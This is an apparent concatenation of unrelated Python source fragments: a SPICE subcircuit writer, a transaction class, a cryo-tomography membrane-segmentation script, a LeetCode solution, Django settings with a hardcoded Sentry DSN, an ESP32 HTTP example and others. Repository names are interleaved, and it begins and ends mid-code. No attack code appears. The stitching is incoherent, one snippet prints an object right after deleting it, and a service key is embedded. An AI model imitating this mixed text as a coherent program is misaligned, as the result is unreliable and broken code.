Parameters ---------- name : str, optional name of the subcircuit, by default '' external_nodes : list, optional external nodes of the subcircuit to connect with other devices, by default [] suffix : str, optional suffix to use while instantiating the subcircuit, by default '' comment : str, optional comment about the subcircuit will be written in netlist, by default '' """ super().__init__() self.name = name self.ext_nodes = external_nodes self.suffix = suffix self.comment = comment self._update_start_line() self._update_end_line() def _update_start_line(self): """Update starting line in SPICE format based on subcircuit attributes """ self.start_line = ('.SUBCIRCUIT %s %s%s') % ( self.name, ' '.join(self.ext_nodes), _END_OF_LINE) def _update_end_line(self): """Update ending line in SPICE format based on subcircuit attributes """ self.end_line = ('.ENDS %s%s') % (self.name, _END_OF_LINE) def load_from_file( self, subcircuit_filepath, external_nodes: list = [], name: str = '', suffix: str = ''): """ Load subcircuit from subcircuit_filepath .cir file Parameters ---------- subcircuit_filepath : str subcircuit filepath to load from external_nodes : list, optional external nodes of the subcircuit, by default [] name : str, optional name of the sub circuit, by default '' suffix : str, optional suffix to use while instantiating the subcircuit """ # Update SubCircuit attributes based on parameters self.subcircuit_filepath = subcircuit_filepath self.ext_nodes = external_nodes self.name = name self.suffix = suffix # Read the file and updates subcircuit accordingly with open(subcircuit_filepath, 'r') as f: # Read first line line = f.readline() split_line = line.split() k = 0 # If name is empty, update name, starting and ending line based on first line of the file if not name: self.name = split_line[1] self._update_start_line() self._update_end_line() # If ext_nodes is empty update it based on first line of the file if not self.ext_nodes: self.ext_nodes = split_line[2:] print(('subcircuit %s will be loaded from file to the netlist.') % (self.name)) # Retrieve information line by line and update instances while line: k += 1 line = f.readline() split_line = line.split() first_char = split_line[0][0] # Check first character to identify device if first_char in ['R', 'L', 'C']: value = float(split_line[-1]) self.rlc_instance(first_char, split_line[1:-1], value) elif first_char == 'X': self.subcircuit_instance(split_line[-1], split_line[1:-1]) elif first_char in ['.']: if split_line[0] == '.ENDS': print('New subcircuit .\n') break else: print(('Line %d : Unidentified component.') % (k)) def _write_subcircuit(self, f: io.TextIOWrapper): """Write subcircuit and nested subcircuit using text stream f Parameters ---------- f : io.TextIOWrapper text stream where subcircuit is written Raises ------ ValueError if text stream f is closed TypeError if f is not an """ if isinstance(f, io.TextIOWrapper): if f.closed: raise ValueError('Write operation on closed file.') else: self._update_start_line() self._update_end_line() lines = ''.join(self.devices) # Write subcircuit in file using text stream f self._write_comment(f, self.comment) f.write(self.start_line) f.write(lines) # Write subcircuits nested in subcircuit for subcircuit in self.subcircuits: self._write_comment(f, ' ') self._write_comment(f, 'Inner subcircuit') if hasattr(subcircuit, 'subcircuit_filepath'): self._write_comment( f, ('subcircuit loaded from : %s') % (subcircuit.subcircuit_filepath) ) subcircuit._write_subcircuit(f) f.write(self.end_line) else: 
raise TypeError('f must be an io.TextIOWrapper') kasaya/workers/transactiond/transaction.py class Transaction(object): def __init__(self, operations=None): self.operations = [] self.reverse_operations = [] if operations: for op in operations: self.add_operation(op[0], op[1]) def add_operation(self, operation, reverse): self.operations.append({ 'method': operation, 'status': None }) self.reverse_operations.append({ 'method': reverse, 'status': None }) def get_reverse_operation(self, i): return self.reverse_operations[i]['method'] def get_operation(self, i): return self.operations[i]['method'] def get_operations_count(self): return len(self.operations) 10-100 """ Pre-processing for mb_graph_batch.py of oriented membranes from TomoSegMemTV output Input: - STAR file with 3 columns: + _rlnMicrographName: tomogram original + _rlnImageName: TomoSegMemTV density map output + _psSegLabel: (optional) label for membrane segmentation + _psSegImage: (optional) binary mask to focus the segmentation analysis + _mtMtubesCsv: (optional) a .csv file with microtubule center lines - Setting for segmenting the membranes from TomoSegMemTV density map: + Density threshold: (optional) required if _psSegLabel not defined + Size threshold: (optional) required if _psSegLabel not defined - Sub-volume splitting settings Output: - A STAR file with 3 columns: + _rlnMicrographName: tomogram original + _rlnImageName: sub-volumes + _psSegImage: Un-oriented membrane segmentations for each subvolume + Columns for localizing the sub-volumes within each original tomogram """ ################# Package import import argparse import gc import os import sys import math import time import pyseg as ps import scipy as sp import skimage as sk import numpy as np from pyseg.globals import signed_distance_2d ###### Global variables __author__ = '' MB_LBL, MB_NEIGH = 1, 2 MB_NEIGH_INT, MB_NEIGH_EXT = 2, 3 ######################################################################################## # PARAMETERS ######################################################################################## ROOT_PATH = '/fs/pool/pool-ruben/antonio/shiwei' # Input STAR file in_star = ROOT_PATH + '/pre/in/mb_seg_single_oriented.star' # Output directory out_dir = ROOT_PATH + '/pre/mbo_nosplit' # Subvolume splitting settings sp_split = None # (2, 2, 1) sp_off_voxels = 30 # vox # Membrane segmentation sg_res = 0.52 # nm/voxel sg_th = None # 8 sg_sz = None # 3e3 sg_mb_thick = 4 # nm sg_mb_neigh = 15 # nm # CSV file pre-processing cv_coords_cools = (1, 2, 3) cv_id_col = 4 # Microtubule settings mt_rad = 30 # nm mt_swap_xy = False ######################################################################################## # MAIN ROUTINE ######################################################################################## # Get them from the command line if they were passed through it parser = argparse.ArgumentParser() parser.add_argument('--inStar', default=in_star, help='Input star file.') parser.add_argument('--outDir', default=out_dir, help='Output directory.') parser.add_argument('--spSplit', nargs='+', type=int, default=sp_split, help='Number of splits (X, Y, Z).') parser.add_argument('--spOffVoxels', type=int, default=sp_off_voxels, help='Offset voxels.') parser.add_argument('--sgVoxelSize', default=sg_res, type=float, help='Voxel size (nm/voxel).') parser.add_argument('--sgThreshold', type=int, default=sg_th, help='Density threshold.') parser.add_argument('--sgSizeThreshold', type=int, default=sg_sz, help='Size threshold (voxels).') 
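# Note: --spSplit, --sgThreshold and --sgSizeThreshold use -1 as a sentinel for
# "not set"; the parsed values are mapped back to None right after parsing below.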
parser.add_argument('--sgMembThk', default=sg_mb_thick, type=float, help='Segmented membrane thickness (nm)') parser.add_argument('--sgMembNeigh', default=sg_mb_neigh, type=float, help='Segmented membrane neighbours (nm)') args = parser.parse_args() in_star = args.inStar out_dir = args.outDir sp_split = None if args.spSplit == [-1] else args.spSplit sp_off_voxels = args.spOffVoxels sg_res = args.sgVoxelSize sg_th = None if args.sgThreshold == -1 else args.sgThreshold sg_sz = None if args.sgSizeThreshold == -1 else args.sgSizeThreshold sg_mb_thick = args.sgMembThk sg_mb_neigh = args.sgMembNeigh ########## Print initial message print('Pre-processing for SEG analysis of un-oriented membranes from TomoSegMemTV output.') print('\tAuthor: ' + __author__) print('\tDate: ' + time.strftime("%c") + '\n') print('Options:') print('\tOutput directory: ' + str(out_dir)) print('\tInput STAR file: ' + str(in_star)) print('\tData resolution: ' + str(sg_res) + ' nm/vx') if sg_th is not None: print('\tSegmentation settings: ') print('\t\t-Density threshold: ' + str(sg_th)) print('\t\t-Size threshold: ' + str(sg_sz) + ' vx') print('\tSub-volume splitting settings: ') print('\t\t-Number of splits (X, Y, Z): ' + str(sp_split)) print('\t\t-Offset voxels: ' + str(sp_off_voxels)) print('\tMicrotubule settings:') print('\t\t-Microtube luminal radius: ' + str(mt_rad) + ' nm') print('\tCSV pre-processing: ') print('\t\t-Columns for samples coordinates (X, Y, Z): ' + str(cv_coords_cools)) print('\t\t-Column for microtubule ID: ' + str(cv_id_col)) print('') ######### Process print('Parsing input parameters...') sp_res, mt_rad, sp_off_voxels = float(sg_res), float(mt_rad), int(sp_off_voxels) out_stem = os.path.splitext(os.path.split(in_star)[1])[0] conn_mask = np.ones(shape=(3,3,3)) out_seg_dir = out_dir + '/segs' if not os.path.isdir(out_seg_dir): os.makedirs(out_seg_dir) print('Loading input STAR file...') gl_star = ps.sub.Star() try: gl_star.load(in_star) except ps.pexceptions.PySegInputError as e: print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"') print('Terminated. 
(' + time.strftime("%c") + ')') sys.exit(-1) star = ps.sub.Star() star.add_column(key='_rlnMicrographName') star.add_column(key='_rlnImageName') star.add_column(key='_psSegImage') star.add_column(key='_psSegRot') star.add_column(key='_psSegTilt') star.add_column(key='_psSegPsi') star.add_column(key='_psSegOffX') star.add_column(key='_psSegOffY') star.add_column(key='_psSegOffZ') mode_oriented = False if gl_star.has_column('_rlnOriginX') and gl_star.has_column('_rlnOriginY') and gl_star.has_column('_rlnOriginZ'): print('\t-Segmentation origin found, oriented membrane segmentation activated!') mode_oriented = True print('Main Routine: tomograms loop') tomo_id = 0 for row in range(gl_star.get_nrows()): in_ref = gl_star.get_element('_rlnMicrographName', row) print('\tProcessing tomogram: ' + in_ref) out_ref_stem = os.path.splitext(os.path.split(in_ref)[1])[0] in_mb = gl_star.get_element('_rlnImageName', row) print('\t\t-Loading membrane segmentation: ' + in_mb) tomo_mb = ps.disperse_io.load_tomo(in_mb) tomo_ref = ps.disperse_io.load_tomo(in_ref, mmap=True) off_mask_min_x, off_mask_max_x = 0, tomo_ref.shape[0] off_mask_min_y, off_mask_max_y = 0, tomo_ref.shape[1] off_mask_min_z, off_mask_max_z = 0, tomo_ref.shape[2] wide_x = off_mask_max_x - off_mask_min_x wide_y = off_mask_max_y - off_mask_min_y wide_z = off_mask_max_z - off_mask_min_z mt_mask = None if gl_star.has_column('_mtMtubesCsv'): in_csv = gl_star.get_element('_mtMtubesCsv', row) print('\tReading input CSV file: ' + in_csv) mt_dic = ps.globals.read_csv_mts(in_csv, cv_coords_cools, cv_id_col, swap_xy=mt_swap_xy) mts_points = list() for mt_id, mt_samps in zip(iter(mt_dic.keys()), iter(mt_dic.values())): mts_points += mt_samps mts_points = np.asarray(mts_points, dtype=np.float32) * (1./sg_res) print('\tSegmenting the microtubules...') mt_mask = ps.globals.points_to_mask(mts_points, tomo_mb.shape, inv=True) mt_mask = sp.ndimage.morphology.distance_transform_edt(mt_mask, sampling=sg_res, return_indices=False) mt_mask = mt_mask > mt_rad mb_lbl = 0 if sg_th is None: if gl_star.has_column('_psSegLabel'): mb_lbl = gl_star.get_element('_psSegLabel', row) print('\t\t\t+Segmenting membranes with label: ' + str(mb_lbl)) if mb_lbl > 0: tomo_mb = tomo_mb == mb_lbl else: tomo_mb = tomo_mb > 0 else: tomo_mb = tomo_mb > 0 else: tomo_mb = tomo_mb >= sg_th if gl_star.has_column('_mtMtubesCsv'): tomo_mb *= mt_mask del mt_mask if gl_star.has_column('_psSegImage'): print('\tApplying the mask...') hold_mask = ps.disperse_io.load_tomo(gl_star.get_element('_psSegImage', row)) if mb_lbl > 0: hold_mask = hold_mask == mb_lbl else: hold_mask = hold_mask > 0 tomo_mb *= hold_mask ids_mask = np.where(hold_mask) off_mask_min_x, off_mask_max_x = ids_mask[0].min()-sp_off_voxels, ids_mask[0].max()+sp_off_voxels if off_mask_min_x < 0: off_mask_min_x = 0 if off_mask_max_x > hold_mask.shape[0]: off_mask_max_x = hold_mask.shape[0] off_mask_min_y, off_mask_max_y = ids_mask[1].min()-sp_off_voxels, ids_mask[1].max()+sp_off_voxels if off_mask_min_y < 0: off_mask_min_y = 0 if off_mask_max_y > hold_mask.shape[1]: off_mask_max_y = hold_mask.shape[1] off_mask_min_z, off_mask_max_z = ids_mask[2].min()-sp_off_voxels, ids_mask[2].max()+sp_off_voxels if off_mask_min_z < 0: off_mask_min_z = 0 if off_mask_max_z > hold_mask.shape[2]: off_mask_max_z = hold_mask.shape[2] del hold_mask del ids_mask # ps.disperse_io.save_numpy(tomo_mb, out_dir + '/hold.mrc') if sg_th is not None: print('\tMembrane thresholding...') tomo_sz = ps.globals.global_analysis(tomo_mb, 0.5, c=26) tomo_mb = tomo_sz > 
sg_sz del tomo_sz seg_center = None if mode_oriented: seg_center = np.asarray((gl_star.get_element('_rlnOriginX', row), gl_star.get_element('_rlnOriginY', row), gl_star.get_element('_rlnOriginZ', row))) seg_center[0] -= off_mask_min_x seg_center[1] -= off_mask_min_y seg_center[2] -= off_mask_min_z print('\tSegmenting the membranes...') if sp_split is None: svol_mb = tomo_mb[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z] svol = tomo_ref[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z] svol_dst = sp.ndimage.morphology.distance_transform_edt(np.invert(svol_mb), sampling=sg_res, return_indices=False) svol_seg = np.zeros(shape=svol.shape, dtype=np.float32) if not mode_oriented: svol_seg[svol_dst < sg_mb_neigh + sg_mb_thick] = MB_NEIGH svol_seg[svol_dst < sg_mb_thick] = MB_LBL else: svol_dst = signed_distance_2d(svol_mb, res=1, del_b=True, mode_2d=True, set_point=seg_center) svol_seg[(svol_dst > 0) & (svol_dst < sg_mb_neigh + sg_mb_thick)] = MB_NEIGH_INT svol_seg[(svol_dst < 0) & (svol_dst > -1. * (sg_mb_neigh + sg_mb_thick))] = MB_NEIGH_EXT svol_seg[np.absolute(svol_dst) < sg_mb_thick] = MB_LBL svol_seg[svol_dst == 0] = 0 svol_seg[svol_mb > 0] = MB_LBL out_svol = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '.mrc' out_seg = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '_seg.mrc' ps.disperse_io.save_numpy(svol, out_svol) ps.disperse_io.save_numpy(svol_seg, out_seg) del svol_seg del svol_dst row_dic = dict() row_dic['_rlnMicrographName'] = in_ref row_dic['_rlnImageName'] = out_svol row_dic['_psSegImage'] = out_seg row_dic['_psSegRot'] = 0 row_dic['_psSegTilt'] = 0 row_dic['_psSegPsi'] = 0 row_dic['_psSegOffX'] = off_mask_min_x # 0 row_dic['_psSegOffY'] = off_mask_min_y # 0 row_dic['_psSegOffZ'] = off_mask_min_z star.add_row(**row_dic) else: print('\tSplitting into subvolumes:') if sp_split[0] > 1: hold_wide = int(math.ceil(wide_x / sp_split[0])) hold_pad = int(math.ceil((off_mask_max_x - off_mask_min_x) / sp_split[0])) hold_split = int(sp_split[0] * math.ceil(float(hold_pad)/hold_wide)) offs_x = list() pad_x = off_mask_min_x + int(math.ceil((off_mask_max_x-off_mask_min_x) / hold_split)) offs_x.append((off_mask_min_x, pad_x+sp_off_voxels)) lock = False while not lock: hold = offs_x[-1][1] + pad_x if hold >= off_mask_max_x: offs_x.append((offs_x[-1][1] - sp_off_voxels, off_mask_max_x)) lock = True else: offs_x.append((offs_x[-1][1]-sp_off_voxels, offs_x[-1][1]+pad_x+sp_off_voxels)) else: offs_x = [(off_mask_min_x, off_mask_max_x),] if sp_split[1] > 1: hold_wide = int(math.ceil(wide_y / sp_split[1])) hold_pad = int(math.ceil((off_mask_max_y - off_mask_min_y) / sp_split[1])) hold_split = int(sp_split[1] * math.ceil(float(hold_pad) / hold_wide)) offs_y = list() pad_y = off_mask_min_y + int(math.ceil((off_mask_max_y-off_mask_min_y) / hold_split)) offs_y.append((off_mask_min_x, pad_y + sp_off_voxels)) lock = False while not lock: hold = offs_y[-1][1] + pad_y if hold >= off_mask_max_y: offs_y.append((offs_y[-1][1] - sp_off_voxels, off_mask_max_y)) lock = True else: offs_y.append((offs_y[-1][1] - sp_off_voxels, offs_y[-1][1] + pad_y + sp_off_voxels)) else: offs_y = [(off_mask_min_x, off_mask_max_x),] if sp_split[2] > 1: hold_wide = int(math.ceil(wide_z / sp_split[2])) hold_pad = int(math.ceil((off_mask_max_z - off_mask_min_z) / sp_split[2])) hold_split = int(sp_split[2] * math.ceil(float(hold_pad) / hold_wide)) offs_z = list() pad_z = off_mask_min_z + 
int(math.ceil((off_mask_max_z-off_mask_min_z) / hold_split)) offs_z.append((off_mask_min_z, pad_z + sp_off_voxels)) lock = False while not lock: hold = offs_z[-1][1] + pad_z if hold >= off_mask_max_z: offs_z.append((offs_z[-1][1] - sp_off_voxels, off_mask_max_z)) lock = True else: offs_z.append((offs_z[-1][1] - sp_off_voxels, offs_z[-1][1] + pad_z + sp_off_voxels)) else: offs_z = [(off_mask_min_z, off_mask_max_z),] split_id = 1 for off_x in offs_x: for off_y in offs_y: for off_z in offs_z: print('\t\t-Splitting subvolume: [' + str(off_x) + ', ' + str(off_y) + ', ' + str(off_z) +']') svol_mb = tomo_mb[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]] svol = tomo_ref[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]] svol_seg = np.zeros(shape=svol.shape, dtype=np.float32) if not mode_oriented: svol_dst = sp.ndimage.morphology.distance_transform_edt(np.invert(svol_mb), sampling=sg_res, return_indices=False) svol_seg[svol_dst < sg_mb_neigh + sg_mb_thick] = MB_NEIGH svol_seg[svol_dst < sg_mb_thick] = MB_LBL else: seg_off_center = seg_center - np.asarray((off_x[0], off_y[0], off_z[0])) svol_dst = signed_distance_2d(svol_mb, res=1, del_b=True, mode_2d=True, set_point=seg_off_center) svol_seg[(svol_dst > 0) & (svol_dst < sg_mb_neigh + sg_mb_thick)] = MB_NEIGH_INT svol_seg[(svol_dst < 0) & (svol_dst > -1. * (sg_mb_neigh + sg_mb_thick))] = MB_NEIGH_EXT svol_seg[np.absolute(svol_dst) < sg_mb_thick] = MB_LBL svol_seg[svol_dst == 0] = 0 svol_seg[svol_mb > 0] = MB_LBL out_svol = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '.mrc' out_seg = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '_mb.mrc' ps.disperse_io.save_numpy(svol, out_svol) ps.disperse_io.save_numpy(svol_seg, out_seg) del svol_seg del svol_dst split_id += 1 row_dic = dict() row_dic['_rlnMicrographName'] = in_ref row_dic['_rlnImageName'] = out_svol row_dic['_psSegImage'] = out_seg row_dic['_psSegRot'] = 0 row_dic['_psSegTilt'] = 0 row_dic['_psSegPsi'] = 0 row_dic['_psSegOffX'] = off_x[0] row_dic['_psSegOffY'] = off_y[0] row_dic['_psSegOffZ'] = off_z[0] star.add_row(**row_dic) # Prepare next iteration gc.collect() tomo_id += 1 out_star = out_dir + '/' + out_stem + '_pre.star' print('\tStoring output STAR file in: ' + out_star) star.store(out_star) print('Terminated. 
(' + time.strftime("%c") + ')')kkcookies99/UASTDataset/Leetcode/train/1/235.py0 class Solution: def XXX(self, nums: List[int], target: int) -> List[int]: hash_map = {} for i in range(len(nums)): if nums[i] in hash_map: return [hash_map[nums[i]], i] hash_map.setdefault(target-nums[i], i) WilliamSampaio/ExerciciosPython import os np1 = float(input('digite NP1: ')) while np1 < 0 or np1 > 10: print('NP1 inválida!') np1 = float(input('digite NP1: ')) np2 = float(input('digite NP2: ')) while (np2 < 0 or np2 > 10): print('NP2 inválida!') np2 = float(input('digite NP2: ')) media = (np1 + np2) / 2 if media == 10: print(f'MÉDIA: {media} (APROVADO COM DISTINÇÃO)') elif media >= 7: print(f'MÉDIA: {media} (APROVADO)') else: print(f'MÉDIA: {media} (REPROVADO)') os.system("pause") '''Group''' from functools import cmp_to_key from zDogPy.anchor import Anchor, shapeSorter class Group(Anchor): updateSort = False visible = True # ------ # update # ------ def updateSortValue(self): sortValueTotal = 0 self.checkFlatGraph() for item in self.flatGraph: item.updateSortValue() sortValueTotal += item.sortValue # average sort value of all points # def not geometrically correct, but works for me self.sortValue = sortValueTotal / len(self.flatGraph) if self.updateSort: self.flatGraph.sort(key=cmp_to_key(shapeSorter)) # ------ # render # ------ def render(self, ctx, renderer): if not self.visible: return self.checkFlatGraph() for item in self.flatGraph: item.render(ctx, renderer) def getFlatGraph(self): # do not include children, group handles rendering & sorting internally return [self] def updateFlatGraph(self): # get flat graph only used for group # do not include in parent flatGraphs # do not include self flatGraph = [] for child in self.children: childFlatGraph = child.getFlatGraph() flatGraph += childFlatGraph self.flatGraph = flatGraph """ Django settings for openhumansimputer project. Generated by 'django-admin startproject' using Django 2.0.2. For more information on this file, see https://docs.djangoproject.com/en/2.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.0/ref/settings/ """ import os import dj_database_url from env_tools import apply_env import logging import sentry_sdk from sentry_sdk.integrations.django import DjangoIntegration from sentry_sdk.integrations.celery import CeleryIntegration logger = logging.getLogger(__name__) apply_env() # Build paths inside the project like this: os.path.join(BASE_DIR, ...) PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Directory for helpers and data BASE_DATA_DIR = os.getenv('BASE_DATA_DIR') # Directory where we log to LOG_DIR = os.getenv('LOGDIR') # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! 
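# --- Illustrative note, not part of the original settings module: the flags
# parsed below only react to the literal strings 'false' / 'true' (any case).
# With hypothetical environment values:
#   DEBUG=false  -> DEBUG is False;   DEBUG unset, '0' or 'no' -> DEBUG stays True
#   REMOTE=true  -> REMOTE is True;   REMOTE unset or '1'      -> REMOTE stays False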
DEBUG = False if os.getenv('DEBUG', '').lower() == 'false' else True print('DEBUG: {}'.format(DEBUG)) REMOTE = True if os.getenv('REMOTE', '').lower() == 'true' else False print('REMOTE: {}'.format(REMOTE)) #ALLOWED_HOSTS = ['*'] ALLOWED_HOSTS = ['.openimpute.com', '192.168.3.11'] REMOTE_APP_NAME = os.getenv('REMOTE_APP_NAME', '') DEFAULT_BASE_URL = ('http://{}'.format(REMOTE_APP_NAME) if REMOTE else 'http://127.0.0.1:5000') #HEROKUCONFIG_APP_NAME = 'http://172.16.58.3' #DEFAULT_BASE_URL = 'http://172.16.58.3:8000' OPENHUMANS_APP_BASE_URL = os.getenv('APP_BASE_URL', DEFAULT_BASE_URL) if OPENHUMANS_APP_BASE_URL[-1] == "/": OPENHUMANS_APP_BASE_URL = OPENHUMANS_APP_BASE_URL[:-1] OPENHUMANS_APP_REDIRECT_URI = OPENHUMANS_APP_BASE_URL + '/complete' # Open Humans configuration OPENHUMANS_CLIENT_ID = os.getenv('OH_CLIENT_ID') OPENHUMANS_CLIENT_SECRET = os.getenv('OH_CLIENT_SECRET') OH_ACTIVITY_PAGE = os.getenv('OH_ACTIVITY_PAGE') OPENHUMANS_OH_BASE_URL = 'https://www.openhumans.org' OH_API_BASE = OPENHUMANS_OH_BASE_URL + '/api/direct-sharing' OH_DIRECT_UPLOAD = OH_API_BASE + '/project/files/upload/direct/' OH_DIRECT_UPLOAD_COMPLETE = OH_API_BASE + '/project/files/upload/complete/' OH_DELETE_FILES = OH_API_BASE + '/project/files/delete/' # Imputer Settings # in production this should be False TEST_CHROMS = True if os.environ.get( 'TEST_CHROMS', '').lower() == 'true' else False if TEST_CHROMS: print('using chr21 and chr22 for testing') CHROMOSOMES = ["{}".format(i) for i in list(range(5, 8))] + ["23"] else: CHROMOSOMES = ["{}".format(i) for i in list(range(1, 24))] # Applications installed INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # Local apps. Update these if you add or change app names! 'imputer.apps.ImputerConfig', 'datauploader.apps.DatauploaderConfig', 'open_humans.apps.OpenHumansConfig', 'main.apps.MainConfig' ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'whitenoise.middleware.WhiteNoiseMiddleware' ] MIDDLEWARE_CLASSES = ( # Simplified static file serving. 
# https://warehouse.python.org/project/whitenoise/ 'whitenoise.middleware.WhiteNoiseMiddleware' ) ROOT_URLCONF = 'openhumansimputer.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'openhumansimputer.wsgi.application' # Database # https://docs.djangoproject.com/en/2.0/ref/settings/#databases # https://devcenter.heroku.com/articles/django-app-configuration DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } db_from_env = dj_database_url.config(conn_max_age=500) DATABASES['default'].update(db_from_env) # Password validation # https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': ('django.contrib.auth.password_validation.' 'UserAttributeSimilarityValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'MinimumLengthValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'CommonPasswordValidator'), }, { 'NAME': ('django.contrib.auth.password_validation.' 'NumericPasswordValidator'), }, ] # Configure logging. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s' } }, 'handlers': { 'gunicorn': { 'level': 'DEBUG', 'class': 'logging.handlers.RotatingFileHandler', 'formatter': 'verbose', 'filename': os.path.join(LOG_DIR, 'gunicorn.errors'), 'maxBytes': 1024 * 1024 * 200, # 100 mb }, 'console': { 'class': 'logging.StreamHandler', }, }, 'loggers': { 'gunicorn.errors': { 'level': 'DEBUG', 'handlers': ['gunicorn'], 'propagate': True, }, 'oh': { 'level': 'DEBUG', 'handlers': ['console'], 'propogate': True } } } # Internationalization # https://docs.djangoproject.com/en/2.0/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.0/howto/static-files/ STATIC_ROOT = os.path.join(BASE_DIR, 'static') STATIC_URL = '/static/' STATICFILES_FINDERS = [ 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ] STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage' INSTALLED_APPS += ['django_extensions'] # celery settings CELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL') # Directory config, change these if you have a different setup. 
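# --- Illustrative note, not part of the original settings module: each path below
# is built as os.path.join(BASE_DATA_DIR, os.getenv(...)). os.getenv() returns None
# for a missing variable, and os.path.join(..., None) raises TypeError, so all of
# these variables must be exported before Django imports the settings. With the
# hypothetical values BASE_DATA_DIR=/data and IMP_BIN=impute2, IMP_BIN resolves
# to '/data/impute2'.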
# Also make sure these are in /etc/default/celeryd IMP_BIN = os.path.join(BASE_DATA_DIR, os.getenv('IMP_BIN')) REF_PANEL = os.path.join(BASE_DATA_DIR, os.getenv('REF_PANEL')) DATA_DIR = os.path.join(BASE_DATA_DIR, os.getenv('DATA_DIR')) REF_FA = os.path.join(BASE_DATA_DIR, os.getenv('REF_FA')) OUT_DIR = os.path.join(BASE_DATA_DIR, os.getenv('OUT_DIR')) # Sentry sentry_sdk.init( dsn="https://113d97f46e91488b91cc664e94a9d8e2@sentry.io/1294965", integrations=[DjangoIntegration(), CeleryIntegration()] ) class Person: """Create a new Person""" def __init__(self, fname, lname): self.fname = fname self.lname = lname newPerson = Person("Dony", "Beckar") anotherOne = Person("first", "last") newPerson.fname = "Cris" newPerson.lname = "Ronaldo" del newPerson #Displaying the output print(newPerson) # print(newPerson.fname) # print(newPerson.lname) # print(anotherOne.fname) # print(anotherOne.lname)# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries # SPDX-License-Identifier: MIT import board import busio from digitalio import DigitalInOut import adafruit_esp32spi.adafruit_esp32spi_socket as socket from adafruit_esp32spi import adafruit_esp32spi import adafruit_requests as requests # Add a secrets.py to your filesystem that has a dictionary called secrets with "ssid" and # "password" keys with your WiFi credentials. DO NOT share that file or commit it into Git or other # source control. # pylint: disable=no-name-in-module,wrong-import-order try: from secrets import secrets except ImportError: print("WiFi secrets are kept in secrets.py, please add them there!") raise # If you are using a board with pre-defined ESP32 Pins: esp32_cs = DigitalInOut(board.ESP_CS) esp32_ready = DigitalInOut(board.ESP_BUSY) esp32_reset = DigitalInOut(board.ESP_RESET) # If you have an externally connected ESP32: # esp32_cs = DigitalInOut(board.D9) # esp32_ready = DigitalInOut(board.D10) # esp32_reset = DigitalInOut(board.D5) spi = busio.SPI(board.SCK, board.MOSI, board.MISO) esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset) print("Connecting to AP...") while not esp.is_connected: try: esp.connect_AP(secrets["ssid"], secrets["password"]) except RuntimeError as e: print("could not connect to AP, retrying: ", e) continue print("Connected to", str(esp.ssid, "utf-8"), "\tRSSI:", esp.rssi) # Initialize a requests object with a socket and esp32spi interface socket.set_interface(esp) requests.set_socket(socket, esp) JSON_GET_URL = "http://httpbin.org/get" # Define a custom header as a dict. headers = {"user-agent": "blinka/1.0.0"} print("Fetching JSON data from %s..." 
% JSON_GET_URL) response = requests.get(JSON_GET_URL, headers=headers) print("-" * 60) json_data = response.json() headers = json_data["headers"] print("Response's Custom User-Agent Header: {0}".format(headers["User-Agent"])) print("-" * 60) # Read Response's HTTP status code print("Response HTTP Status Code: ", response.status_code) print("-" * 60) # Close, delete and collect the response data response.close() print('Yo world!') 1-10 #!/usr/bin/env python from iris_sdk.models.base_resource import BaseData from iris_sdk.models.data.losing_carrier_tn_list import LosingCarrierTnList from iris_sdk.models.maps.lnp_losing_carriers import LnpLosingCarriersMap class LnpLosingCarriers(LnpLosingCarriersMap, BaseData): def __init__(self): self.losing_carrier_tn_list = LosingCarrierTnList()from .tacotron import Tacotron """ API Response Objects """ import datetime from fastapp.models import FastAppModel class PingResponse(FastAppModel): """ Response returned for the `/ping` endpoint """ healthy: bool = True status: int timestamp: datetime.datetime class SentimentResponse(FastAppModel): """ 